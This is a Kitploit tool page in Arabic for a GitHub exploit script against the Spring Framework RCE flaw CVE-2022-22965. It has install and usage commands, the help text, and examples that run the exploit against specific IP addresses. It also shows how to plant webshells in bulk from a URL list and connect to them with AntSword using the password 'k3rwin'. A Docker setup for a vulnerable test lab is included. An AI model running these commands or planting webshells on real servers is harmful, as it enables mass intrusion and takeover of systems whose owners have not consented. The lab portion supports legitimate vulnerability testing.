Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
spring-core-rce — ثغرة RCE في إطار Spring CVE-2022-22965 | Kitploit
أدوات/GitHubGitHub/k3rwin/spring-core-rce
الاستطلاعتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubk3rwin/spring-core-rce

spring-core-rce

ثغرة RCE في إطار Spring CVE-2022-22965

عرض المستودع
28112منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Spring Core RCE/CVE-2022-22965

النطاق المتأثر: إطار Spring والإطارات المشتقة منه مع JDK>=9

رابط المقال

البرنامج النصي للاستخدام التعليمي فقط، وأي استخدام آخر يتحمل المسؤولية القانونية ولا يتحمل المؤلف أي مسؤولية

1.التثبيت

root@kitploit:~
pip3 install -r requirements.txt

2.الاستخدام

root@kitploit:~
$ python3 spring-core-rce.py -h

 .----..-.-. .---. .-..-. .-..----.     .----. .---. .---. .----.     .---. .----..----.
{ {__-`| } }}} }}_}{ ||  \{ || |--' ___ | }`-'/ {-. \} }}_}} |__} ___ } }}_}| }`-'} |__}
.-._} } | |-' | } \ | }| }\  {| }-`}{___}| },-.\ '-} /| } \ } '__}{___}| } \ | },-.} '__}
`----' `-'   `-'-' `-'`-' `-'`----'     `----' `---' `-'-' `----'     `-'-' `----'`----'


                                                 Spring framework Core RCE
                                                                  By:K3rwin
usage: spring-core-rce.py [-h] [-u URL] [-s SYSTEM] [-r FILE]

Spring framework Core 0day RCE 帮助指南

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     指定url
  -s SYSTEM, --system SYSTEM
                        指定目标主机操作系统,默认linux,参数为win/linux
  -r FILE, --file FILE  指定url文件,批量写马

3.مثال

كشف غير مدمر

-u,--url أو استخدام -f,--file للكشف الجماعي

-c,--check, المعلمة هي خدمة HTTP ذاتية البناء، يمكن استخدام python3 -m http.server 80 لإنشاء خادم ويب سريعًا

يُستخدم بشكل أساسي في الشبكة الداخلية وعند الحاجة إلى كشف غير مدمر للثغرات

root@kitploit:~
python3 spring-core-rce.py -u "http://172.26.155.18:8080/" --check "http://172.26.155.18"

image-20220422153433867

استخدم -u لتحديد url، و -s لتحديد نظام التشغيل. المعامِلات: linux أو win، الافتراضي هو linux

root@kitploit:~
python3 spring-core-rce.py -u "http://1.117.155.217:8080/" -s "linux"

image-20220331203209702

image-20220331203858753

استخدم -r لكتابة webshell بشكل جماعي، واستخدم AntSword للاتصال، كلمة المرور هي k3rwin

root@kitploit:~
python3 spring-core-rce.py -r "urls.txt"

image-20220402112140568

image-20220402112349943

4.الهدف

①. إعداد بيئة اختبار Docker محليًا:

docker pull vulfocus/spring-core-rce-2022-03-29:latest

docker run -d -p 8080:8080 --name spring-core-rce -it vulfocus/spring-core-rce-2022-03-29

②. بيئة اختبار عبر الإنترنت

تنزيل الأداة